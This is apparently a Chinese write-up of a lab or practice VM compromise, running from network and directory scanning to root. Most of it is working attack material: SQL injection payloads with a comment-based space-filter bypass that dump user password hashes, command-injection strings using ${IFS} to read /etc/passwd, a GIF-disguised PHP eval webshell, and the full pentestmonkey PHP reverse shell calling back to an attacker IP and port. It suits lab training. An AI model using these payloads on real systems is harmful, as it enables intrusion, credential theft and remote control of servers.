一，信息收集

1.网段探测

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.163.28
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.152 d2:a6:97:bb:46:9d       (Unknown: locally administered)
192.168.163.193 00:0c:29:01:34:57       VMware, Inc.
192.168.163.209 7c:b5:66:a5:f0:a5       Intel Corporate3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded

2.端口扫描

┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.163.193              
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:01:34:57 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -p- 192.168.163.193      
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6ba824d6092fc99a8eabbc6e7d4eb9ad (RSA)
|   256 abe84f5338062c6af392e3974a0e3ed1 (ECDSA)
|_  256 327690b87dfca4326310cd676149d6c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:01:34:57 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds

3.目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.163.193" -x 403,404,500_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_192.168.163.193/_24-02-26_00-44-22.txtTarget: http://192.168.163.193/[00:44:22] Starting: 
[00:44:41] 200 -    0B  - /config.php                                       
[00:44:51] 200 -  527B  - /login.php                                        
[00:44:52] 302 -    0B  - /logout.php  ->  login.php                        
[00:45:01] 200 -  594B  - /register.php                                     
[00:45:09] 301 -  320B  - /uploads  ->  http://192.168.163.193/uploads/     Task Completed

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.163.193"    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.163.193
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 320] [--> http://192.168.163.193/uploads/]
/server-status        (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished

二，信息分析

访问http://192.168.163.193/login.php，是一个登陆页面，弱密码进不去

通过目录扫描，访问扫http://192.168.163.193//register.php，是一个注册页面，注册账号登陆试试

登陆后，发现是一个查询的页面，猜测有sql注入，不输入任何数据，出现表单

三，sql注入

我是用抓包形式，进行sql注入，个人认为比较方便

1.判断SQL注入

在OSINT后加一个'，页面不显示，任何东西，说明有sql注入
在查显示位，猜测有空格过滤

2.查询显示位

空格过滤
/**/

3.查询注入点

search=-OSINT'/**/union/**/select/**/1,2,3#

4.查询库

search=-OSINT'/**/union/**/select/**/1,2,database()#

5.查询表

search=OSINT'/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema='webapphacking'#

6.查字段

OSINT'/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_name='users'#

7. 查user表中的值

search=OSINT'/**/union/**/select/**/group_concat(user,":",pasword),2,3/**/from/**/users#

user1:5d41402abc4b2a76b9719d911017c592,
user2:6269c4f71a55b24bad0f0267d9be5508,
user3:0f359740bd1cda994f8b55330c86d845,
test:05a671c66aefea124cc08b76ea6d30bb,
superadmin:2386acb2cf356944177746fc92523983,
test1:05a671c66aefea124cc08b76ea6d30bb,
admin:e64b78fc3bc91bcbc7dc232ba8ec59e0,
asd:e64b78fc3bc91bcbc7dc232ba8ec59e0

https://www.somd5.com/

superadmin/Uncrackable

8.登陆superadmin用户

四，漏洞利用

文件上传

白名单

命令执行

在last name中，发现执行点

空格过滤
system('cat${IFS}/etc/passwd')
system('cat$IFS$1/etc/passwd')

查看uploads目录，因为uploads只能上传图片格式的文件，所有我们上传恶意的图片，然后通过命令执行更改后缀名

system('ls${IFS}-al${IFS}/var/www/html/uploads')

year2020这个是上传的目录
system('ls${IFS}-al${IFS}/var/www/html/uploads/year2020')

上传恶意的图片GIF89a
<?php @eval($_POST['c']);?>

修改后缀
system('mv${IFS}/var/www/html/uploads/year2020/1.jpg${IFS}/var/www/html/uploads/year2020/1.php')
执行成功后，查看

访问
http://192.168.163.193/uploads/year2020/1.php

蚁剑连接

五，反弹shell

1.上传php木马文件

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.netset_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.163.209';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;if (function_exists('pcntl_fork')) {$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0);  // Parent exits}if (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;
} else {printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}chdir("/");umask(0);// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {printit("$errstr ($errno)");exit(1);
}$descriptorspec = array(0 => array("pipe", "r"),  // stdin is a pipe that the child will read from1 => array("pipe", "w"),  // stdout is a pipe that the child will write to2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);
}stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);printit("Successfully opened reverse shell to $ip:$port");while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}
}fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);function printit ($string) {if (!$daemon) {print "$string\n";}
}?>

2.本地监听

六，提权

呃，这个提权。。。。。。。。。。。
在legacy目录下有一个可执行文件，直接执行，就是root权限